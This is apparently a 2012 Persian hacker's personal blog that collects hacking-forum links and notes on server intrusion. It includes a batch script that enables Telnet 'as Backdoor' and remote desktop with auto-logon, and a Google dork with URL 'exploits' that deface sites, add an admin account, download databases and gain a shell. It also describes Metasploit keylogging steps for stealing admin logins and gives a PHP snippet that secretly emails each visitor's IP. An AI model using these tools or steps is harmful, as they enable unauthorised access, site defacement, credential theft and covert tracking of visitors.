Friday, June 29, 2012

dozdidane scripte site

بعضی موقع ها اسکریپت سایت به صورت zip شده در فولدر public_html که میتونین خیلی راحت دانلود کنین .

ولی بعضی موقع ها نیست که در این صورت خودتون باید دست به کار شین و public_html را zip کنین و واسه دانلود کردن آمادش کنین.

راستی واسه این کارایی که گفتم حتمآ باید شل داشته باشین .
dastorate   shell dar linux

http://ashiyane.org/forums/showthread.php?t=42739

kesh raftane script

http://ashiyane.org/forums/showthread.php?t=36943

Thursday, June 28, 2012

ashiyane.org/forums/showthread.php?t=71310 mosabeghe  ashiyane

Wednesday, June 27, 2012

شما ببین اول سرور چی هست : لینوکس ؟ یا ویندوز ؟
اگه لینوکس باشه ببین چه کرنلی هست اگه لوکال روتش بود که برور دنبال بک کانکت بعد هم دسترسی روت
اگه ویندوز بود برو سراغ مس دیفیس با شل های ویندوز یا سیملینک
بازم اگه لوکال روتش نبود میتونی سیملینک بزنی یا فایل های کانفینگ سرور رو بخونی


bakhsh  SRV WIN

 http://ashiyane.org/forums/forumdisplay.php?f=98

bakhsh  SRV LIN

http://ashiyane.org/forums/forumdisplay.php?f=97

bakhsh  linux  کاملترین آموزش Linux 2.6.18 2009 Server Hacking
http://ashiyane.org/forums/showthread.php?t=32053

Tuesday, June 26, 2012

config kame meta splot 

https://community.rapid7.com/docs/DOC-1875

rapid dl

http://ashiyane.org/forums/showthread.php?t=73030
iis  http://ashiyane.org/forums/showthread.php?t=39140

iis  http://ashiyane.org/forums/showthread.php?t=54965

Monday, June 25, 2012

best youtube collection



Hak5

 

http://www.youtube.com/watch?v=0qdvdgze0T0

Sunday, June 24, 2012

http://r00tsecurity.org
nahveye nasbe plesk dar linux

http://ashiyane.org/forums/showthread.php?p=373975#post373975

VB

http://ashiyane.org/forums/showthread.php?t=53598

pentest

http://ashiyane.org/forums/showthread.php?t=72809

xss

http://ashiyane.org/forums/showthread.php?t=61080

enteha safe cookie haro goft

http://ashiyane.org/forums/showthread.php?t=70500&page=5

Saturday, June 23, 2012

http://koneksen.com/default-modem-password/  deafault user pass haye modem


اگر روزي دشمن پيدا كردي، بدان در رسيدن به هدفت موفق بودي!

اگر روزي تهديدت كردند، بدان در برابرت ناتوانند! اگر روزي خيانت ديدي،

بدان قيمتت بالاست! اگر روزي تركت كردند، بدان با تو بودن لياقت مي خواهد !
cookie php bara XSS

http://mehakabi.persiangig.com/document/cookie.php

in cookie dar safe :

http://ashiyane.org/forums/showthread.php?threadid=23251  hast'

va j dade shode b shellesh 

Friday, June 22, 2012


به کورش به آرش به جمشید قسم

به نقش و نگار تخت جمشید قسم

که ایران همی قلب و خون من است

گرفته ز جان از وجود من است

بخوانید این جمله در گوش باد

چو ایران نباشد تن من مباد

Thursday, June 21, 2012

in ra bat zakhire konim bara ejra kardan RDP :Make @echo off TITLE Enabeler color 8e cls echo +----------------------------------------------------+ echo ¦ "Enabler" ¦ echo +----------------------------------------------------+ echo. IF "%1"=="-t" goto telnet IF "%1"=="-T" goto telnet IF "%1"=="-r" goto remdesk IF "%1"=="-R" goto remdesk IF "%1"=="-s" goto termserv IF "%1"=="-S" goto termserv IF "%1"=="" goto use goto use :telnet @echo off TITLE Enabeler color 8e cls @echo REGEDIT4>temp.reg echo. >>temp.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>temp.reg echo. >>temp.reg echo "ErrorControl"=dword:00000001>>temp.reg echo "Start"=dword:00000002>>temp.reg echo "Type"=dword:00000010>>temp.reg echo "FailureActions"=hex& #58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,e a,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg echo. >>temp.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\TelnetServer\1.0]>>temp.reg echo. >>temp.reg echo "NTLM"=dword:00000001>>temp.reg echo "TelnetPort"=dword:0000ffff>>temp.reg echo. regedit /s temp.reg echo Starting Service net start tlntsvr echo cleanup del /q temp.reg goto exit :remdesk TITLE Enabeler color 8e cls @echo off echo Windows Registry Editor Version 5.00> c:\RD.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\RD.reg echo "fDenyTSConnections"=dword:00000000>> c:\RD.reg echo "fAllowToGetHelp"=dword:00000000>> c:\RD.reg regedit /s c:\RD.reg del /q c:\RD.reg goto exit :termserv TITLE Enabeler color 8e cls @echo off echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg echo "Start"=dword:00000002>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "AllowTSConnections"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg echo "AutoAdminLogon"="1">> c:\TS.reg @echo --[ Registering the service... ] echo. REGEDIT /S C:\TS.REG REGEDIT -S C:\TS.REG echo [Components] >> c:\bootlog~.txt echo TSEnabled = on >> c:\bootlog~.txt sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q DEL /Q c:\TS.REG DEL /Q c:\bootlog~.txt echo Starting Service net start TermServ goto exit :use @echo off TITLE Enabeler color 8e cls echo +----------------------------------------------------+ echo ¦ "Enabler" ¦ echo +----------------------------------------------------+ echo. echo User: enabler [Option] echo. echo Options: -t Enable [T]elnet as Backdoor on 2k (maybe XP) echo -r Enable [R]emoteDesktop on Win XP echo -s Enable Terminal [S]ervices on XP/2000/2003 echo. pause :exit

Monday, June 18, 2012

abzar scan http://ashiyane.org/forums/showthread.php?t=15312
http://ashiyane.org/forums/showthread.php?t=57072 hame chia az aval ta akhar

http://ashiyane.org/forums/showthread.php?t=44903  bedast avardane ip

http://ashiyane.org/forums/showthread.php?p=331374  client hack 0-100

http://ashiyane.org/forums/showthread.php?t=54024 peyda kardan ip client

http://ashiyane.org/forums/showthread.php?t=57459  client hacking with winshell

http://ashiyane.org/forums/showthread.php?t=49111  peda kardan ip with script

Thursday, June 14, 2012

dastorate ejraee ro server http://ashiyane.org/forums/showthread.php?t=71825 2 Google Search ====> modules.php?name=Downloads عد از این که سرچ کردید یک سایت رو باز کنید . حالا میتونید از لینکی که آخر همین پست گذاشتم چند تا اکسپلیوت جدید کشف شده در این حفره ها را مشاهده کنید . اکسپلیوت ها رو دونه به دونه توضیح میدم کسپلیوت شماره 1 تایتل هوم پیج رو عوض میکنه . اون اکسپلیوتی که روی دیفالت من توی تکست قرار تایتل رو به Hacked By 7security تغییر میده . شما باید عوضش کنید . اکسپلیوت شماره 2 برای شما یک یوزر ادمین با پسوردی که خودتون میخواین اسجاد میکنه . این اکسپلیوت روی دیفالت یوزر 7security و پسورد 12345 را ایجاد میکنه . اکسپلیوت شماره 3 فایل دیتابیس وب سایت رو که دارای تمام مشخصات هست و دانلود میکنه که شما باید اون رو با ماکروسافت ACCEC باز کنید . بینید . اکسپلیوت شماره 4 هم که بسیار مهم هستش و خیلی کاربرد داره شما رو هم به شل میرسونه و هم به دایرکتوری سایت میبره که میتونین توی دایرکتوری فایل آپلود کنید . روش استفاده از این اکسپلیوت ها به این صورت میباشد که شما باید این Exploit ها رو جلوی Home page وب سایت اصلی قرار بدید . Expolit No.1 ==> ?Function:}ChangeTitle}to==Hacked By 7security Expolit No.2 ==> ?Fubction:}AddAdminitrator}User==7security}Passwor d==12345 Expolit No.3 ==> /Function:}DownloadDataBase}db.mdb Expolit No.4 ==> ?AccBUg/http://7security.net
گر از سیستم دسترسی دارید از متاسپلویت استفاده کنید دستور keyscan_start کیلاگر را فعال می کند و هر چیزی که کاربر تایپ کند را ذخیره می کند برای این که یوزر و پسورد لاگین کردن ادمین را بدست بیاری اول باید به پروسس یا process مربوط به winlogon.exe مهاجرت یا migrate کنی بعد keyscan را اجرا کنی
http://black-hg.org/cc/showthread.php?t=453

Wednesday, June 13, 2012

http://scx010c075.blogspot.com/2012/01/exploit-windows-xp-sp3-using-metasploit.html
http://www.myiptest.com/img.php?id=ug8gbyv4p http://www.myiptest.com/staticpages/index.php/how-about-you?id=ug8gbyv4p&show_ip=1
http://statcounter.com/

ba oftadane ip  ro site


 <?
$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i");
$email = "boshrast71@yahoo.com";
$sujet = "Ip + Host";
$message = "Zhtml>Zbody>Time : $date<br>Ip : $ip<br>Host : $host</body></html>";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Not Found!";}
else { echo "";}
?>
<!-- Begin Susa Web Tools - IP Viewer -->
<script src="http://susawebtools.ir/services/ipviewer/index.php?skin=23"></script>
<div align="center"><a href="http://susawebtools.ir/?p=43">Susa Web Tools</a></div>
<!-- End Susa Web Tools - IP Viewer -->

Tuesday, June 5, 2012

http://pauldotcom.com/2010/07/metasploit-new-gui.html

http://pauldotcom.com/2012/04/hack-naked-tv-episode-31-1.html

http://nmap.org/book/ncat-man.html